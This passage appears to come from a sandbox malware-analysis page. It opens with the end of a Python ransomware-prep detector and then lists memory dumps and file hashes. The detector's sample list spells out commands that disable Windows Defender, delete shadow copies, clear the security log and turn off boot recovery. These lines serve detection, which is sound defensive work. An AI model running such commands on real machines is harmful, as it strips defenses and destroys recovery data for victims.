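    r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable',
    r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    r'vssadmin.exe delete shadows /all /quiet',
    r'wmic.exe shadowcopy delete',
    r'wevtutil.exe cl security',
    r'bcdedit.exe /set {default} recoveryenabled no',
    r'ipconfig /all',
]


def classify(cmdline: str) -> List[str]:
    """Return the tactic tags matched by one command line ([] if none)."""
    lowered = cmdline.lower()
    return [tag for tag, rx in RULES if rx.search(lowered)]


def score_session(cmdlines: List[str]) -> Dict[str, int]:
    """Count hits per tactic across the command lines of one process tree."""
    counts: Dict[str, int] = {}
    for cmd in cmdlines:
        for tag in classify(cmd):
            counts[tag] = counts.get(tag, 0) + 1
    return counts


def is_ransomware_prep(cmdlines: List[str], min_distinct: int = 4) -> bool:
    """Alert on breadth, not on any single command. min_distinct is an
    assumed threshold: this sample triggers all eleven tactics, while an
    admin script normally touches one or two."""
    return len(score_session(cmdlines)) >= min_distinct


if __name__ == "__main__":
    for cmd in SAMPLE:
        print(classify(cmd) or "-", cmd)
    counts = score_session(SAMPLE)
    print("distinct tactics:", len(counts), "ransomware prep:", is_ransomware_prep(SAMPLE))
```

Feed it the command lines of a single parent's descendants (process-creation events with the parent pid, or the tree reconstructed from WriteProcessMemory rows) rather than the whole host, or the breadth signal is diluted by unrelated activity.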

Network

Files

memory/3284-130-0x0000000000000000-mapping.dmp

memory/1456-131-0x0000000000000000-mapping.dmp

memory/3200-132-0x0000000000000000-mapping.dmp

memory/464-133-0x0000000000000000-mapping.dmp

memory/1972-134-0x0000000000000000-mapping.dmp

memory/4128-135-0x0000000000000000-mapping.dmp

memory/4284-136-0x0000000000000000-mapping.dmp

memory/4496-137-0x0000000000000000-mapping.dmp

memory/2392-138-0x0000000000000000-mapping.dmp

memory/3308-139-0x0000000000000000-mapping.dmp

memory/2176-140-0x0000000000000000-mapping.dmp

memory/4184-141-0x0000000000000000-mapping.dmp

memory/4940-142-0x0000000000000000-mapping.dmp

memory/1348-143-0x0000000000000000-mapping.dmp

memory/1324-144-0x0000000000000000-mapping.dmp

memory/2980-145-0x0000000000000000-mapping.dmp

memory/4768-146-0x0000000000000000-mapping.dmp

memory/4944-147-0x0000000000000000-mapping.dmp

memory/4860-148-0x0000000000000000-mapping.dmp

memory/228-149-0x0000000000000000-mapping.dmp

memory/1844-150-0x0000000000000000-mapping.dmp

memory/3348-151-0x0000000000000000-mapping.dmp

memory/4404-152-0x0000000000000000-mapping.dmp

memory/2044-153-0x0000000000000000-mapping.dmp

memory/1328-154-0x0000000000000000-mapping.dmp

memory/3500-155-0x0000000000000000-mapping.dmp

memory/908-156-0x0000000000000000-mapping.dmp

memory/2972-157-0x0000000000000000-mapping.dmp

memory/1048-158-0x0000000000000000-mapping.dmp

memory/2984-159-0x0000000000000000-mapping.dmp

memory/3544-160-0x0000000000000000-mapping.dmp

memory/4044-161-0x0000000000000000-mapping.dmp

memory/4168-162-0x0000000000000000-mapping.dmp

memory/4156-163-0x0000000000000000-mapping.dmp

memory/2772-164-0x0000000000000000-mapping.dmp

memory/4452-165-0x0000000000000000-mapping.dmp

memory/1708-166-0x0000000000000000-mapping.dmp

memory/1556-167-0x0000000000000000-mapping.dmp

memory/4376-168-0x0000000000000000-mapping.dmp

memory/4568-169-0x0000000000000000-mapping.dmp

memory/4036-170-0x0000000000000000-mapping.dmp

memory/3188-171-0x0000000000000000-mapping.dmp

memory/1404-172-0x0000000000000000-mapping.dmp

memory/1940-173-0x0000000000000000-mapping.dmp

memory/3460-174-0x0000000000000000-mapping.dmp

memory/4928-175-0x0000000000000000-mapping.dmp

memory/4268-176-0x0000000000000000-mapping.dmp

memory/4416-177-0x0000000000000000-mapping.dmp

memory/5056-178-0x0000000000000000-mapping.dmp

memory/3132-179-0x0000000000000000-mapping.dmp

memory/4492-180-0x0000000000000000-mapping.dmp

memory/2840-181-0x0000000000000000-mapping.dmp

memory/5116-182-0x0000000000000000-mapping.dmp

memory/3856-183-0x0000000000000000-mapping.dmp

memory/1936-184-0x0000000000000000-mapping.dmp

memory/64-185-0x0000000000000000-mapping.dmp

memory/3660-186-0x0000000000000000-mapping.dmp

memory/3752-187-0x0000000000000000-mapping.dmp

memory/1304-188-0x0000000000000000-mapping.dmp

memory/1864-189-0x0000000000000000-mapping.dmp

memory/1228-190-0x0000000000000000-mapping.dmp

memory/4128-191-0x0000000000000000-mapping.dmp

memory/2596-192-0x0000000000000000-mapping.dmp

memory/4780-193-0x0000000000000000-mapping.dmp

memory/828-194-0x0000029450000000-0x0000029450022000-memory.dmp

memory/828-196-0x0000029450053000-0x0000029450055000-memory.dmp

memory/828-195-0x0000029450050000-0x0000029450052000-memory.dmp

memory/828-197-0x0000029450056000-0x0000029450058000-memory.dmp

memory/828-198-0x00007FFF79620000-0x00007FFF7A0E1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 59d97011e091004eaffb9816aa0b9abd
SHA1 1602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA256 18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512 d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

memory/1036-201-0x00007FFF79620000-0x00007FFF7A0E1000-memory.dmp

memory/1036-202-0x0000025979850000-0x0000025979852000-memory.dmp